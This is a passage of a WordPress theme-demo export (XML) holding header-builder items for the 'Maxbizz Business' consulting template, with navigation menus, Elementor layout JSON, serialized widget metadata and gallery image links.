										Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
				<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Business">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1874"><a href="http://wpdemo.archiwp.com/maxbizz-business/">Home</a></li>
<li id="menu-item-1433"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1537"><a href="http://wpdemo.archiwp.com/maxbizz-business/about-us/">About Us</a></li>
	<li id="menu-item-1559"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Our Services 1</a></li>
	<li id="menu-item-1554"><a href="http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1543"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1544"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/">Our Team</a></li>
	<li id="menu-item-1545"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1541"><a href="http://wpdemo.archiwp.com/maxbizz-business/elements/">Elements</a></li>
	<li id="menu-item-1546"><a href="http://wpdemo.archiwp.com/maxbizz-business/typography/">Typography</a></li>
	<li id="menu-item-1542"><a href="http://wpdemo.archiwp.com/maxbizz-business/faqs/">FAQs</a></li>
	<li id="menu-item-1538"><a href="http://wpdemo.archiwp.com/maxbizz-business/404-2/">404</a></li>
	<li id="menu-item-1539"><a href="http://wpdemo.archiwp.com/maxbizz-business/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1557"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1560"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1558"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1556"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1563"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1555"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Services</a>
<ul>
	<li id="menu-item-1553"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1552"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1551"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1550"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1549"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1548"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1547"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog</a>
<ul>
	<li id="menu-item-1561"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog List</a></li>
	<li id="menu-item-1562"><a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1540"><a href="http://wpdemo.archiwp.com/maxbizz-business/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-business/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts">free quote</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>106</wp:post_id>
		<wp:post_date><![CDATA[2020-07-23 03:53:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-23 03:53:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"cc784fd","elType":"section","settings":{"layout":"full_width","content_position":"middle","structure":"21","background_background":"classic","background_color":"#262832","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"1d738b2","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"32895ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","item_icon_secondary_color":"#FFFFFF","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","_padding":{"unit":"px","top":"7","right":"0","bottom":"7","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#18A6F0","hover_border_color":"#18A6F0","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"78dcf95","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"c94f846","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_align":"right","icon_color":"#4B83FC","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"8","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"}],"isInner":false}],"isInner":false},{"id":"37d086b","elType":"section","settings":{"layout":"full_width","structure":"33","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.09)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"d44a756","elType":"column","settings":{"_column_size":25,"_inline_size":18.047000000000000596855898038484156131744384765625},"elements":[{"id":"76a2789","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":2074},"_padding":{"unit":"px","top":"26","right":"0","bottom":"28","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"a71a42c","elType":"column","settings":{"_column_size":50,"_inline_size":63.90599999999999880628820392303168773651123046875,"content_position":"center","align":"center","_ot_content_align":"horizontal","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"a6322eb","elType":"widget","settings":{"nav_menu":"main-menu","space_item":{"unit":"px","size":29,"sizes":[]},"text_hover_color":"#4B82FB","_margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"menu_typography_typography":"custom","menu_typography_font_size":{"unit":"px","size":14,"sizes":[]},"menu_typography_font_weight":"700","smenu_typography_typography":"custom"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"990f116","elType":"column","settings":{"_column_size":25,"_inline_size":18.0270000000000010231815394945442676544189453125,"align":"flex-end","_ot_content_align":"horizontal","_ot_column_min_width":{"unit":"px","size":260,"sizes":[]},"content_position":"center"},"elements":[{"id":"3ea33c9","elType":"widget","settings":{"bg_btn":"#4B83FC","_margin":{"unit":"px","top":"0","right":"40","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f41aa01","elType":"widget","settings":{"text":"free quote","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#4A81F9"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:2:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:16:"content_position";i:2;s:5:"align";i:2;s:17:"_ot_content_align";i:2;s:20:"_ot_column_min_width";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:2:{s:13:"space_between";i:1;s:10:"icon_align";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:6:"margin";i:1;s:7:"padding";i:2;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:5:{s:10:"space_item";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:25:"menu_typography_font_size";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:27:"smenu_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:6:"btn_bg";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Center</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-mobile-logo-center/</link>
		<pubDate>Sat, 23 May 2020 11:00:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=168</guid>
		<description></description>
		<content:encoded><![CDATA[<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>						   	
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>168</wp:post_id>
		<wp:post_date><![CDATA[2020-05-23 11:00:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-23 11:00:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile-logo-center]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d17082b","elType":"section","settings":{"structure":"30","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"cd86fb1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":30,"_ot_content_align":"horizontal"},"elements":[{"id":"82c9ed8","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","pos_menu":"on-left"},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false},{"id":"331e8c4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"9b03ba7","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"align":"center","logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"1f2ae1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":30},"elements":[{"id":"5b15a8e","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-23]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:8:"pos_menu";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:3;s:19:"_inline_size_mobile";i:3;s:17:"_ot_content_align";i:2;s:5:"align";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:10:"logo_image";i:1;s:5:"align";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Side Panel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/side-panel/</link>
		<pubDate>Fri, 24 Apr 2020 07:40:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=253</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
		Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.		
			<h4>Gallery</h4>		
			<figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-10" href='https://maxbizz.s3.amazonaws.com/images/project-10.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-10-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-10-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-10-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-12" href='https://maxbizz.s3.amazonaws.com/images/project-12.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-12-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-12-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-12-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-12-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-12.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-9" href='https://maxbizz.s3.amazonaws.com/images/project-9.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-9-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-9-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-9-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-9-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-9.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-7" href='https://maxbizz.s3.amazonaws.com/images/project-7.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-7-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-7-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-7-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
